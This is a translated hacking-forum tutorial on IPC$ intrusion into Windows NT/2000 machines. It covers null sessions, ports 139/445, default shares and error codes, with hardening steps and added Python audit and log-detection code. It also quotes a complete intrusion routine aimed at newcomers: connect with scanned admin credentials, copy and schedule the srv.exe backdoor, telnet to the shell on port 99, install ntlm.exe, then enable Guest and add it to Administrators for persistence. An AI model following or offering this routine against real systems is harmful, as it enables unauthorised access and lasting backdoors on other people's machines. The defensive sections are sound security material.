IPC$ LAN Intrusion Explained in Detail

xiaoxiao  2021-03-06

1. Foreword

Articles about IPC$ intrusion are everywhere, and the attack steps have been repeated so often that they have become a fixed template; nobody wants to write yet another one. Even so, I think most of those articles are not detailed enough. For a newcomer meeting IPC$ for the first time, a bare recipe does not answer their many questions (search any hacking forum for IPC$ and see how many of those questions there are). I have now written this up twice, and the two write-ups below are meant as a summary that clears up the points people most often confuse, so that everyone stops getting stuck in the same places. If you still have questions after reading, reply right away!

2. What is IPC$

IPC$ (the Inter-Process Communication share) is a shared "named pipe" resource, as every article says. Its purpose is to let a caller who supplies a username and password, and is verified against them, obtain the corresponding permissions; it is used when remotely managing a computer and when viewing that computer's shared resources. With IPC$, a connector can even establish a null (empty) connection to the target host without any username or password (of course, the other machine must have the IPC$ share open, otherwise nothing can connect), and through that null connection obtain the target's user list (although a diligent administrator will disable enumeration of users). Everyone keeps saying "the IPC$ vulnerability", but IPC$ is not really a vulnerability: it is the remote network logon feature Windows opens so that administrators can manage machines remotely, and along with it the system opens the default shares, namely every logical drive (C$, D$, E$ ...) and the system directory Winnt or Windows (admin$). All of this was meant to make administration easier, but good intentions are not always matched by good outcomes: people with other motives will use IPC$ to reach shared resources, export the user list, and run dictionary tools against the passwords, hoping to obtain higher privileges and use them for purposes nobody sanctioned.

Points of confusion:
1) IPC$ connections are a remote network logon feature found only in Windows NT and later, roughly comparable to Telnet on UNIX. Because IPC$ depends on many DLL functions that exist only in NT, it cannot run on Windows 9x. In other words, only NT/2000/XP can establish IPC$ connections; 98/ME cannot (some friends say they have made a null connection from 98, and I cannot confirm it, but it is 2003 now and I suggest the 98 comrades change systems; 98 is no longer cool).
2) Even a null connection cannot be established if the other side has closed the IPC$ share.
3) Establishing a connection does not guarantee that you can view the other side's user list, because the administrator can disable user enumeration.

3. IPC$ connections in an attack

As said above, even a null connection can give you a lot of information (information that is often essential) and access to some shares. If you can log in as a user with certain permissions you get those permissions, and if you log in as an administrator there is nothing more to say: what u want, u can do!! (Broadly: collect information about the target, manage its processes and services, upload a Trojan and run it, and on 2000 Server consider enabling Terminal Services for convenient control. Isn't that enough?) But do not celebrate too early. The administrator's password is not that easy to get. A few careless administrators still use an empty or trivial password, but they are a minority, and unlike in the past, as people's security awareness grows administrators have become more careful, so obtaining the administrator password will only get harder. :( Your most likely outcome is a connection with minimal or no privileges, and you will gradually find that IPC$ is not a universal key; when the host has not even opened the IPC$ share, you cannot connect at all. So do not treat IPC$ intrusion as an ultimate weapon or expect it to decide the fight on its own. It is like the pass before a shot on goal: rarely decisive by itself, but indispensable. That, I think, is the real meaning of IPC$ connections in an intrusion.

4. How IPC$, null connections, ports 139/445 and the default shares relate

These relationships are probably what confuses newcomers most, and most articles never spell them out. My own understanding is not exhaustive; the following is what I have gathered from discussions with everyone (a good BBS discussion helps a lot).
1) IPC$ and null connections: an IPC$ connection made without a username and password is a null connection. Once you connect as a specific user or as the administrator (that is, an IPC$ connection with a real username and password) it is no longer a null connection. Many people ask: if I can connect anyway, why bother guessing weak passwords? As I said above, when you log in over a null connection you have no permissions at all (very frustrating), whereas when you log in as a user or as the administrator you have the corresponding permissions (who does not want permissions? so stop being lazy).
2) IPC$ and ports 139/445: an IPC$ connection enables remote logon and access to the default shares. An open port 139 indicates that NetBIOS is in use, and access to shared files and printers goes over port 139 or, on Win2000, port 445. So in general an IPC$ connection requires port 139 or 445 to be reachable.
3) IPC$ and the default shares: the default shares are shares opened automatically to ease remote administration (they can of course be turned off), namely every logical drive (C$, D$, E$ ...) and the system directory Winnt or Windows (admin$). Through an IPC$ connection we can reach those default shares, provided the other side has not removed them.

5. Why an IPC$ connection fails

The following five reasons are the most common:
1) your own system is not NT or later;
2) the other side has not opened the IPC$ default share;
3) the other side has not opened port 139 or 445 (or a firewall is blocking them);
4) your command is mistyped (a space in the wrong place, for example);
5) wrong username or password (for a null connection this of course does not apply).
You can also diagnose the cause from the returned error number:
Error 5, access denied: the account you used very likely has no administrator privileges; raise your privileges first.
Error 51, Windows cannot find the network path: a network problem.
Error 53, the network path was not found: the IP address is wrong; the target's LanmanServer service is not running; the target has a firewall (port filtering).
Error 67, the network name cannot be found: your LanmanWorkstation service is not running, or the target has deleted IPC$.
Error 1219, the supplied credentials conflict with an existing set of credentials: you already have an IPC$ connection to the other side; delete it and try again.
Error 1326, unknown username or bad password: the cause is obvious.
Error 1792, an attempt was made to log on but the network logon service was not started: the target's Netlogon service is not running (this appears when connecting to a domain).
Error 2242, the password of this user has expired: the target has an account policy that forces periodic password changes.
IPC$ connections are a fairly complex matter; beyond the reasons above there are other uncertain factors that cannot all be listed, and everyone will have to learn them through experience and experiment.

6. How to open IPC$ on the target (this section is taken from related articles)

First you need a shell that does not depend on IPC$, such as a SQL Server command-shell extension (xp_cmdshell), Telnet, or a Trojan, and that shell must have admin privileges. Then run net share ipc$ from the shell to open the target's IPC$. After that, IPC$ can be used as described above. Make sure the related services are running; if they are not, start them (if you do not know how, see the usage of the net command), and if that does not work either (a firewall or antivirus is in the way, for example) I recommend giving up.

7. How to defend against IPC$ intrusion

1 Disable enumeration over null sessions (this does not prevent null connections from being established; taken from "Anatomy of Null Sessions under Win2000"):
Run Regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] and set the DWORD value RestrictAnonymous to 1. (Setting it to 2 causes problems, for example some Windows services stop working.)
2 Disable the default shares
1) View local shared resources: Run - cmd - enter net share
2) Delete the shares (one per line, press Enter after each):
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (continue with e$, f$, ... if they exist)
3) Stop the Server service: net stop server /y (the shares come back after a restart, because the Server service starts again)
4) Modify the registry: Run - Regedit
Server edition: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the DWORD value AutoShareServer to 0.
Professional edition: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the DWORD value AutoShareWks to 0.
If the value does not exist, create it (right-click - New - DWORD value) and then set it.

3 Permanently close IPC$ and the default shares by disabling the related service, LanmanServer (display name Server): Control Panel - Administrative Tools - Services - find the Server service - right-click - Properties - General - Startup type - Disabled

4 Install a firewall (and check its settings), or use port filtering (filter ports 139, 445 and so on), or use a recent version of Windows Optimizer (Windows优化大师)

5 Set complex passwords to prevent IPC$ password guessing
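As an added example, not part of the original post, here is a Python audit of the settings from points 1 and 2 above: the three registry values (RestrictAnonymous, AutoShareServer, AutoShareWks) and the list of shares the Server service exports. read_live() reads the real values with the standard-library winreg module and net share when run on Windows; audit() works on whatever values it is given, so the constructed sample at the bottom runs anywhere. The key paths and value names are the ones from the text; the recommendation strings are mine.

```python
"""Audit the IPC$ hardening settings from the section above (added example)."""
import platform
import subprocess

# (registry key under HKLM, DWORD value name, hardened value), taken from the text above.
# AutoShareServer applies to Server editions and AutoShareWks to Professional; setting
# both to 0 is harmless, so the audit expects both.
CHECKS = [
    (r"SYSTEM\CurrentControlSet\Control\Lsa", "RestrictAnonymous", 1),
    (r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters", "AutoShareServer", 0),
    (r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters", "AutoShareWks", 0),
]
ADMIN_SHARES = {"IPC$", "ADMIN$"}


def is_default_share(name: str) -> bool:
    """IPC$, ADMIN$ and the drive shares C$, D$, ... are the automatic shares."""
    up = name.upper()
    return up in ADMIN_SHARES or (len(up) == 2 and up[0].isalpha() and up[1] == "$")


def audit(settings: dict, shares: list) -> list:
    """settings maps a value name to its current DWORD (None if the value is absent);
    shares is the list of share names the Server service currently exports.
    Returns one finding per problem; an empty list means the box matches the text."""
    findings = []
    for key, name, want in CHECKS:
        cur = settings.get(name)
        if cur is None:
            # An absent value means the permissive default is in effect.
            findings.append(f"{name} is missing under HKLM\\{key}; create it as DWORD {want}")
        elif name == "RestrictAnonymous" and cur == 2:
            findings.append("RestrictAnonymous=2 is stricter than the recommended 1 and "
                            "is known to break some services; use 1")
        elif cur != want:
            findings.append(f"{name}={cur} under HKLM\\{key}; set it to {want}")
    exposed = sorted(s for s in shares if is_default_share(s))
    if exposed:
        findings.append("default shares still exported: " + ", ".join(exposed)
                        + " (net share <name> /delete, or stop the Server service)")
    return findings


def parse_net_share(output: str) -> list:
    """Pull the share names out of `net share` output: the first token of each line
    after the dashed rule, up to the trailing status line."""
    names, in_table = [], False
    for line in output.splitlines():
        if line.startswith("---"):
            in_table = True
            continue
        if in_table and line.strip() and not line.startswith("The command"):
            names.append(line.split()[0])
    return names


def read_live() -> tuple:
    """Read the real values from this Windows host (needs Windows and admin rights)."""
    if platform.system() != "Windows":
        raise RuntimeError("live read only works on Windows")
    import winreg  # standard library, Windows only
    settings = {}
    for key, name, _ in CHECKS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
                settings[name] = winreg.QueryValueEx(k, name)[0]
        except FileNotFoundError:
            settings[name] = None
    out = subprocess.run(["net", "share"], capture_output=True, text=True, check=False).stdout
    return settings, parse_net_share(out)


# Constructed sample of an unhardened Win2000 machine (not a real capture).
SAMPLE_SETTINGS = {"RestrictAnonymous": None, "AutoShareServer": 1, "AutoShareWks": None}
SAMPLE_NET_SHARE = """
Share name   Resource                        Remark

-------------------------------------------------------------------------------
IPC$                                         Remote IPC
ADMIN$       C:\\WINNT                        Remote Admin
C$           C:\\                             Default share
D$           D:\\                             Default share
baby         C:\\
The command completed successfully.
"""

if __name__ == "__main__":
    try:
        settings, shares = read_live()
    except RuntimeError:
        settings, shares = SAMPLE_SETTINGS, parse_net_share(SAMPLE_NET_SHARE)
    for f in audit(settings, shares) or ["no findings"]:
        print("-", f)
```

Run it as administrator on the machine you are hardening; an empty result means all three values are set as the text recommends and no automatic share is left. A non-default share such as baby is reported nowhere, since whether it should exist is a business question, not a hardening one.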

8. Related commands

1) Create a null connection: net use \\IP\ipc$ "" /user:"" (pay attention to the spacing: there is a space before the empty password "" and another before /user:)

2) Create a non-null connection: net use \\IP\ipc$ "password" /user:"username" (the same spacing applies; the password comes first, then /user: with the account name)

3) Map a default share: net use z: \\IP\c$ "password" /user:"username" (this maps the other side's C drive as your Z drive; other drives work the same way). If you already have an IPC$ connection to the target, you can map the drive-letter share directly: net use z: \\IP\c$

4) Delete an IPC$ connection: net use \\IP\ipc$ /del

5) Delete a mapped share: net use z: /del removes the mapping of the drive you mapped as Z (other drive letters work the same way); net use * /del removes all of them, and you will be prompted to press Y to confirm

The following intrusion routine is too classic to leave out; most IPC$ tutorials include it, so I quote it here. My thanks to the original author (I do not know which senior wrote it).

1. C:\>net use \\127.0.0.1\ipc$ "password" /user:"username"
   The administrator account and password are usually obtained by scanning for weak passwords with Fluxay (流光).
2. C:\>copy srv.exe \\127.0.0.1\admin$
   First copy srv.exe over (it is in Fluxay's Tools directory). admin$ is the other side's system root, C:\Winnt; you can also use c$ or d$ for the C and D drives, depending on where you want the file.
3. C:\>net time \\127.0.0.1
   Check the time. Suppose it reports that the current time of \\127.0.0.1 is 2004/6/15 11:00 AM and that the command completed successfully.
4. C:\>at \\127.0.0.1 11:05 srv.exe
   Schedule srv.exe to start at 11:05.
5. C:\>net time \\127.0.0.1
   Is it time yet? Once the current time of \\127.0.0.1 is 2004/6/15 11:05 AM, continue with the following command.
6. C:\>telnet 127.0.0.1 99
   Note the port: Telnet defaults to port 23, but srv has opened port 99 for us on the other side. We can telnet in, but srv is one-shot and would have to be activated again next time, so we will set up a proper Telnet service. That is what ntlm.exe is for.
7. C:\>copy ntlm.exe \\127.0.0.1\admin$
   Copy ntlm.exe to the host the same way (ntlm.exe is also in Fluxay's Tools directory).
8. C:\Winnt\System32>ntlm
   Type ntlm in the shell obtained in step 6 (the prompt C:\Winnt\System32> is on the other side, so ntlm actually runs on the remote computer). When it prints "DONE" it has worked. Then run net start telnet to start the Telnet service.

9. telnet 127.0.0.1, then enter the username and password, and you are inside the other machine; operating it is as simple as DOS! (What to do next? Whatever you like, haha.)

To keep our access, we activate Guest and add it to the administrators group:
10. C:\>net user guest /active:yes   activates the other side's Guest account

11. C:\>net user guest 1234   changes Guest's password to 1234, or to whatever you want

12. C:\>net localgroup administrators guest /add   adds Guest to the Administrators group (if the administrator's password is later changed but the Guest account is left alone, we can use Guest to get into this computer again next time)

IPC$ Explained in Detail

1. Foreword

Articles about IPC$ intrusion are everywhere, and the attack steps have been repeated so often that they have become a classic template, so nobody wants to write one any more. Even so, I think those articles are not detailed enough: for a newcomer meeting IPC$ for the first time they leave many questions unanswered (search any hacking forum for IPC$ and see how many such questions there are). So I have consulted material, tutorials and forum posts on the Internet and written this summary, hoping to clear up the points that are most easily confused so that everyone stops getting stuck in the same places. Note: everything discussed in this article assumes a Win NT/2000 environment. Win98 is not discussed, and since Win XP has tightened its security settings, some individual operations do not apply to it; I may discuss that separately when there is a chance.

2. What is IPC$

IPC$ (the Inter-Process Communication share) is a shared "named pipe" resource. It is the named pipe that opens inter-process communication between two machines: the two sides establish a session by presenting a username and password that the server trusts, and then exchange data over that session, which is how a remote computer is accessed. IPC$ is a feature of NT/2000, and it has one peculiarity: only one set of credentials can be in use between a given pair of machines at a time (a second connection with different credentials fails with error 1219). Alongside IPC$, NT/2000 also opens the default shares: every logical drive (C$, D$, E$ ...) and the system directory Winnt or Windows (admin$). Microsoft's intention with all of this was to make administration easier, but, intentionally or not, it lowered the system's security. We often hear someone talk about "the IPC$ vulnerability", but IPC$ is not really a vulnerability; I think whoever says so must be referring to Microsoft's own "back door": the null session. So what is a null session?

3. What is a null session

Before introducing null sessions we need to understand how an authenticated session is established. In Windows NT 4.0 a challenge/response protocol is used to set up a session with the remote machine. A successfully established session becomes a secure tunnel through which the two sides exchange information. The rough procedure is as follows:
1) The session requester (client) sends a packet to the session receiver (server) asking to establish the tunnel;
2) The server generates a random 64-bit number (the challenge) and sends it back to the client;
3) The client takes the 64-bit number, encrypts it using (a hash of) the password of the account it wants to use, and returns the result to the server (the response);
4) The server passes the response to the Local Security Authority (LSA), which verifies it using the user's correct password to confirm the requester's identity. If the requester's account is a local account of the server, the check is done locally; if it is a domain account, the response is forwarded to a domain controller for verification.
When the response to the challenge is verified, an access token is generated and returned to the client. The client uses this access token to connect to resources on the server until the session is terminated. That is, roughly, how an authenticated session is established. So what is a null session?

A null session is a session established with the server without presenting credentials (that is, without a username and password). Under the Win2000 access control model the null session is still given a token, but since no user information was authenticated while it was set up, that token contains no user information; this is also why the system will not send protected information over such a session. That does not mean the null session's token has no security identifier (SID), the value that identifies the user and locale: for a null session the SID in the token supplied by the LSA is S-1-5-7, the SID of the null session, and the username is ANONYMOUS LOGON (this name can be seen in the user list, but it is not in the SAM database). The access token also contains the following groups: Everyone and Network. Within the limits of the security policy, the null session has access to whatever those two groups are allowed to access. So what can we do once we have a null session?

4. What a null session can do

On NT, with default security settings, a null session can list the users and shares on the target host, access shares that grant Everyone permission, and read a small part of the registry; there is no great value in it. On 2000 the value is even lower, because by default only Administrators and Backup Operators are allowed to access the registry from the network, and even that is not easy to achieve. From this it looks as though a non-trusted session is of little use, but from the viewpoint of a complete IPC$ intrusion the null session is an indispensable stepping stone, because it gives us a user list, and to an experienced hacker that is already enough. The following are the specific commands that can be used over a null session:

1 First, create a null session (IPC$). Command: net use \\IP\ipc$ "" /user:""
Note: the command contains four spaces: one between net and use, one after use, and one on each side of the empty password "".

2 View the remote host's shared resources. Command: net view \\IP
Explanation: after the null connection is established, this command lists the shares of the remote host. If it has any, you get output like the following:

Shared resources at \\*

Share name   Type   Used as   Comment
-------------------------------------------------------------------------------
NETLOGON     Disk             Logon server share
SYSVOL       Disk             Logon server share
The command completed successfully.

3 View the remote host's current time. Command: net time \\IP
Explanation: this command obtains the current time of the remote host.

4 Obtain the NetBIOS name table (requires NBT to be enabled on your own machine): nbtstat -A IP
This command fetches the target's NetBIOS name table, which includes the computer name, its domain or workgroup and, in the <03> Messenger entries, the logged-on user name (your own NetBIOS support must be enabled). It returns something like the following:

       Node IpAddress: [*.*.*.*] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    SERVER         <00>  UNIQUE      Registered
    OYAMANISHI-H   <00>  GROUP       Registered
    OYAMANISHI-H   <1C>  GROUP       Registered
    SERVER         <20>  UNIQUE      Registered
    OYAMANISHI-H   <1B>  UNIQUE      Registered
    OYAMANISHI-H   <1E>  GROUP       Registered
    SERVER         <03>  UNIQUE      Registered
    OYAMANISHI-H   <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
    INet~Services  <1C>  GROUP       Registered
    IS~SERVER......<00>  UNIQUE      Registered

    MAC Address = 00-50-8B-9A-2D-37

The above is the common use of null sessions. It seems to offer a lot, but note one thing: the operation of establishing an IPC$ connection leaves a record in the EventLog, whether or not it succeeds. Now let's look at the ports IPC$ uses.
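The EventLog record mentioned above is the defender's opportunity. As an added example (not from the original post), here is a Python routine that runs over Security-log logon events, exported as plain dicts, and flags the IPC$ patterns this article describes: null sessions (a network logon, logon type 3, by ANONYMOUS LOGON with SID S-1-5-7), a burst of failed network logons from one source (password guessing), and a success from a source that had just been guessing. The event IDs are the real ones (540/529 on NT/2000/XP, 4624/4625 on Vista and later); the field names and the sample records are constructed for this example.

```python
"""Flag IPC$-style activity in Security-log logon events (added example)."""
from collections import Counter, defaultdict

ANONYMOUS_SID = "S-1-5-7"          # SID of the null session, as described above
NETWORK_LOGON = 3                  # logon type 3 = logon from the network (IPC$, shares)
SUCCESS_IDS = {540, 4624}          # successful network logon: NT/2000/XP, Vista and later
FAILURE_IDS = {529, 4625}          # failed logon: NT/2000/XP, Vista and later


def is_null_session(ev: dict) -> bool:
    """A successful network logon by the anonymous identity."""
    return (ev.get("event_id") in SUCCESS_IDS
            and ev.get("logon_type") == NETWORK_LOGON
            and (ev.get("sid") == ANONYMOUS_SID
                 or ev.get("account", "").upper() == "ANONYMOUS LOGON"))


def summarize(events: list, guess_threshold: int = 5) -> list:
    """Return alerts as (source_ip, kind, count) tuples, sorted for stable output.
    kinds: 'null_session', 'password_guessing', 'guess_then_success'."""
    nulls, failures = Counter(), Counter()
    successes = defaultdict(set)            # source -> accounts that logged on for real
    for ev in events:
        if ev.get("logon_type") != NETWORK_LOGON:
            continue                        # console and service logons are out of scope here
        src = ev.get("source_ip", "?")
        if is_null_session(ev):
            nulls[src] += 1
        elif ev.get("event_id") in FAILURE_IDS:
            failures[src] += 1
        elif ev.get("event_id") in SUCCESS_IDS:
            successes[src].add(ev.get("account", ""))
    alerts = [(src, "null_session", n) for src, n in nulls.items()]
    for src, n in failures.items():
        if n >= guess_threshold:
            alerts.append((src, "password_guessing", n))
            if successes.get(src):
                # the guessing source later logged on with a real account
                alerts.append((src, "guess_then_success", len(successes[src])))
    return sorted(alerts)


def sample_events() -> list:
    """Constructed records (not a real log): one host probing with a null session,
    one host guessing the administrator password and finally getting in."""
    events = [
        {"event_id": 540, "logon_type": 3, "account": "ANONYMOUS LOGON",
         "sid": ANONYMOUS_SID, "source_ip": "10.0.0.5"},
        {"event_id": 4624, "logon_type": 3, "account": "ANONYMOUS LOGON",
         "sid": ANONYMOUS_SID, "source_ip": "10.0.0.5"},
        # an ordinary user reaching a share: not interesting
        {"event_id": 540, "logon_type": 3, "account": "bob",
         "sid": "S-1-5-21-1-2-3-1001", "source_ip": "10.0.0.7"},
        # a local console logon (528, type 2): wrong logon type, ignored
        {"event_id": 528, "logon_type": 2, "account": "alice",
         "sid": "S-1-5-21-1-2-3-1002", "source_ip": "127.0.0.1"},
    ]
    for _ in range(6):
        events.append({"event_id": 529, "logon_type": 3, "account": "Administrator",
                       "sid": "", "source_ip": "10.0.0.9"})
    events.append({"event_id": 540, "logon_type": 3, "account": "Administrator",
                   "sid": "S-1-5-21-1-2-3-500", "source_ip": "10.0.0.9"})
    return events


if __name__ == "__main__":
    for src, kind, n in summarize(sample_events()):
        print(f"{src:15} {kind:20} {n}")
```

The threshold is deliberately low because a legitimate user rarely fails a network logon five times in a row; tune it to your environment. With RestrictAnonymous set as in the hardening section, the null-session alert still fires (the connection is made), which is exactly what makes it a useful indicator of someone enumerating.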

5. Ports used by IPC$

First some basic knowledge:
1 SMB (Server Message Block) is the Windows protocol for file and printer sharing;
2 NBT (NetBIOS over TCP/IP) uses ports 137 (UDP), 138 (UDP) and 139 (TCP) to carry NetBIOS over TCP/IP;
3 In Windows NT, SMB runs on top of NBT; in Windows 2000, SMB can also run directly over TCP port 445 in addition to NBT.

With that in mind, we can look at how access to network shares relates to these ports:

For a Win2000 client:
1 If NBT is enabled, the client tries ports 139 and 445 of the server at the same time. If 445 answers, the client sends an RST to close the 139 connection and continues the session on 445; if 445 does not answer, only 139 is used; if neither answers, the session fails.
2 If NBT is disabled, the client only tries port 445; if 445 does not answer, the session fails. So a Win2000 client with NBT disabled cannot connect to a server that offers only port 139 (an NT server, for example).

For a Win2000 server:
1 If NBT is enabled, UDP ports 137 and 138 and TCP ports 139 and 445 are open;
2 If NBT is disabled, only port 445 is open.

The IPC$ sessions we establish follow the same rules. Clearly, if the remote server is not listening on port 139 or 445, no IPC$ session can be created.
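The nbtstat -A output quoted in section 4 and the port rules above meet in a single UDP/137 exchange, the NetBIOS node-status query (RFC 1002, question type NBSTAT, 0x21). As an added example, not code from the original post, the following Python builds that request, parses the response into the name table and MAC address that nbtstat prints, and can be pointed at a live host with query_host(). So that it runs offline, constructed_response() assembles a response modelled on the quoted nbtstat output (the names and MAC address are taken from the text; the name flags and TTL are my assumptions, not a capture).

```python
"""NetBIOS node-status query over UDP/137, the exchange behind nbtstat -A (added example)."""
import socket
import struct

NBSTAT_TYPE = 0x0021   # question type of a node-status request (RFC 1002)
IN_CLASS = 0x0001
# Common NetBIOS name suffixes and the services they stand for.
SUFFIXES = {0x00: "Workstation / domain name", 0x03: "Messenger (logged-on user)",
            0x1B: "Domain Master Browser", 0x1C: "Domain Controllers",
            0x1D: "Master Browser", 0x1E: "Browser Elections", 0x20: "File Server"}


def encode_nb_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding (RFC 1001 14.1): the 16-byte NetBIOS name is split into
    nibbles and each nibble is written as 'A' + nibble. "*" is the wildcard used by
    node-status queries and is padded with NULs instead of spaces."""
    if name == "*":
        raw = b"*" + b"\x00" * 15
    else:
        raw = name.upper().ljust(15).encode("ascii") + bytes([suffix])
    encoded = bytes(0x41 + nib for b in raw for nib in (b >> 4, b & 0x0F))
    return bytes([len(encoded)]) + encoded + b"\x00"


def build_node_status_request(tid: int) -> bytes:
    """12-byte header (query, one question) + encoded "*" name + NBSTAT/IN."""
    header = struct.pack("!HHHHHH", tid, 0x0000, 1, 0, 0, 0)
    return header + encode_nb_name("*") + struct.pack("!HH", NBSTAT_TYPE, IN_CLASS)


def _skip_name(pkt: bytes, off: int) -> int:
    while pkt[off] != 0:
        off += 1 + pkt[off]
    return off + 1


def parse_node_status_response(pkt: bytes, expect_tid: int) -> dict:
    """Return {"names": [...], "mac": "..."} from a NODE STATUS RESPONSE."""
    tid, flags, qdcount, ancount, _, _ = struct.unpack_from("!HHHHHH", pkt, 0)
    if tid != expect_tid or not flags & 0x8000 or ancount < 1:
        raise ValueError("not a response to our node-status query")
    off = 12
    for _ in range(qdcount):                  # normally 0 in a node-status response
        off = _skip_name(pkt, off) + 4
    off = _skip_name(pkt, off)
    rtype, _rclass, _ttl, _rdlen = struct.unpack_from("!HHIH", pkt, off)
    off += 10
    if rtype != NBSTAT_TYPE:
        raise ValueError("answer is not NBSTAT")
    num_names = pkt[off]
    off += 1
    names = []
    for _ in range(num_names):
        raw, suffix, nflags = struct.unpack_from("!15sBH", pkt, off)
        off += 18
        names.append({
            "name": raw.rstrip(b"\x00 ").decode("ascii", "replace"),
            "suffix": suffix,
            "service": SUFFIXES.get(suffix, "unknown"),
            "group": bool(nflags & 0x8000),   # G bit: GROUP vs UNIQUE
            "active": bool(nflags & 0x0400),  # ACT bit: what nbtstat shows as "Registered"
        })
    mac = pkt[off:off + 6]                     # first 6 bytes of the statistics block
    return {"names": names, "mac": "-".join(f"{b:02X}" for b in mac)}


def query_host(ip: str, timeout: float = 2.0) -> dict:
    """Send the request to a live host (UDP/137 must be reachable, i.e. NBT enabled)."""
    tid = 0x1234
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(tid), (ip, 137))
        data, _ = s.recvfrom(1024)
    return parse_node_status_response(data, tid)


def constructed_response(tid: int) -> bytes:
    """A hand-built response modelled on the nbtstat output quoted in this article
    (not a capture); name flags 0x0400 = active unique, 0x8400 = active group."""
    entries = [(b"SERVER", 0x00, 0x0400), (b"OYAMANISHI-H", 0x00, 0x8400),
               (b"OYAMANISHI-H", 0x1C, 0x8400), (b"SERVER", 0x20, 0x0400),
               (b"SERVER", 0x03, 0x0400)]
    rdata = bytes([len(entries)])
    for name, suffix, nflags in entries:
        rdata += struct.pack("!15sBH", name.ljust(15), suffix, nflags)
    rdata += bytes.fromhex("00508b9a2d37") + b"\x00" * 40   # MAC address + zeroed statistics
    header = struct.pack("!HHHHHH", tid, 0x8400, 0, 1, 0, 0)
    answer = encode_nb_name("*") + struct.pack("!HHIH", NBSTAT_TYPE, IN_CLASS, 0, len(rdata))
    return header + answer + rdata


if __name__ == "__main__":
    result = parse_node_status_response(constructed_response(0x1234), 0x1234)
    for n in result["names"]:
        kind = "GROUP" if n["group"] else "UNIQUE"
        print(f'{n["name"]:16}<{n["suffix"]:02X}> {kind:7} {n["service"]}')
    print("MAC Address =", result["mac"])
```

Against a host with NBT disabled (only port 445 open, as in the server rules above) query_host() simply times out, which is the same behaviour you see from nbtstat -A; the SMB session itself would still work over 445, so an empty name table does not mean the IPC$ share is closed.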

6. IPC$ connections in an attack

As mentioned above, even a null connection yields a lot of information (often essential information); if you can log in as a user with certain permissions you get those permissions, and if you log in as an administrator there is nothing more to say, you can basically do what you want. But do not celebrate too early: the administrator's password is not so easy to get. A few careless administrators still have weak passwords, but they are a minority, and as people's security awareness grows administrators have become more careful, so the administrator's password gets harder and harder to obtain. Your most likely result is a connection with minimal or no privileges, or a host that has not even opened the IPC$ share, so that you cannot connect at all. You will slowly discover that IPC$ connections are not a universal key, so do not expect every connection to succeed; that is unrealistic. Discouraging? Not really. The key is the right attitude: do not treat IPC$ intrusion as an ultimate weapon or expect it to settle everything by itself. It is just one intrusion method; sometimes it wins outright, sometimes it yields nothing, and both are normal. In the hacker's world not every road leads to Rome, but there is always one that does, so be patient and keep looking!

7. Common reasons an IPC$ connection fails

Here are some common causes of IPC$ connection failure:

1 IPC$ connections are a feature found only in Windows NT and later; because they rely on many DLL functions that exist only in NT, they cannot work on Windows 9x/ME. In other words, only NT/2000/XP machines can establish IPC$ connections with each other; 98/ME cannot;

2 To create an IPC$ connection the other side must have the IPC$ share open; even a null connection fails if the other side has closed the IPC$ share;

3 Your own LanmanWorkstation service is not running. It provides network connections and communication; without it you cannot issue a connection request (display name: Workstation);

4 The other side's LanmanServer service is not running. It provides RPC support and file, print and named-pipe sharing; IPC$ depends on it, and without it the remote host cannot respond to your connection request (display name: Server);

5 The other side's Netlogon service is not running; it supports pass-through account logon for computers on the network;

6 The other side has disabled NBT (so there is no port 139);

7 The other side's firewall blocks ports 139 and 445;

8 Your username or password is wrong (a null session obviously cannot have this error);

9 Command typing errors: a space too many or too few. When the username and password contain no spaces the double quotes can be omitted; if the password is empty, type two quotation marks "" directly;

10 If the other side restarts its computer while the connection is established, the IPC$ connection is dropped automatically and must be re-established.

You can also diagnose the cause from the returned error number:
Error 5, access denied: the account you used very likely has no administrator privileges; raise your privileges first;
Error 51, Windows cannot find the network path: a network problem;
Error 53, the network path was not found: the IP address is wrong; the target is not powered on; the target's LanmanServer service is not running; the target has a firewall (port filtering);
Error 67, the network name cannot be found: your LanmanWorkstation service is not running, or the target has deleted IPC$;
Error 1219, the supplied credentials conflict with an existing set of credentials: you already have an IPC$ connection to the other side; delete it and connect again;
Error 1326, unknown username or bad password: the cause is obvious;
Error 1792, an attempt was made to log on but the network logon service was not started: the target's Netlogon service is not running;
Error 2242, the password of this user has expired: the target has an account policy that forces periodic password changes.

8. Why a copy fails

Some friends have successfully established an IPC$ connection but then run into trouble with copy: the file cannot be copied. What are the common reasons for a failed copy?

1 Blind copying. This is the most frequent mistake, more than half of all cases. Many friends do not even know whether the other side has a shared folder and copy blindly, with predictably depressing results. So I suggest you always run net view \\IP before copying. Do not assume that because the IPC$ connection succeeded a shared folder must exist.

2 Misjudging the default shares. This mistake is also common and has two sub-cases:

1) Wrongly assuming that a successful IPC$ connection implies the default shares are available, immediately copying to admin$ or another default share, and then retrying when it fails. A successful IPC$ connection only shows that the other side has the IPC$ share open. IPC$ and the default shares are two different things: IPC$ is a named pipe, not an actual folder, and the default shares are not a prerequisite for IPC$;

2) Because net view \\IP does not display the default shares (their names end in $), you cannot tell from it whether the other side has the default shares enabled, so if they are disabled every operation against a default share will fail (most scanning software, however, checks the default shares while it guesses passwords, which avoids this mistake).

3 Insufficient privileges, in four situations: 1) when copying to any share (default or ordinary), most failures are privilege problems; 2) copying to a default share requires administrator privileges; 3) copying to an ordinary share requires the corresponding permission (the access rights the other side set in advance); 4) the other side may use a firewall or security software to block external access to its shares;

It also needs saying: do not assume that Administrator is the administrator; the administrator's account name can be changed.

4 Antivirus or LAN problems. The copy may succeed, but when the program is started remotely it is killed by antivirus software and the file disappears; or you have copied the Trojan to a host inside a LAN and the connection back fails. So confirm that the copy actually worked before relying on it, and otherwise give up. Everyone knows that IPC$ connections throw up all sorts of problems in practice; the above are just the common mistakes, and anything I have missed you will have to work out for yourselves.

